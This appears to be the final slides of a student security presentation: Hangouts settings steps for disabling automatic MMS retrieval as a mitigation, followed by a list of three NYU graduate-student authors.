HANGOUT: Disable auto download of messages:
- Open Hangouts
- Navigate to top left corner - click on Options on the top left corner.
- Tap Settings ->SMS
- In General, if you have HangoutSMSEnabled then in the Advanced uncheck Auto
Retrieve MMS
MITIGATION
19. Mamoon Ismail Khalid
Computer Science Graduate Student
New York University
Parul Sharma
Cybersecurity Graduate Student
New York University
Sahir Riyaz Khan
Cybersecurity Graduate Student
New York University
AUTHORS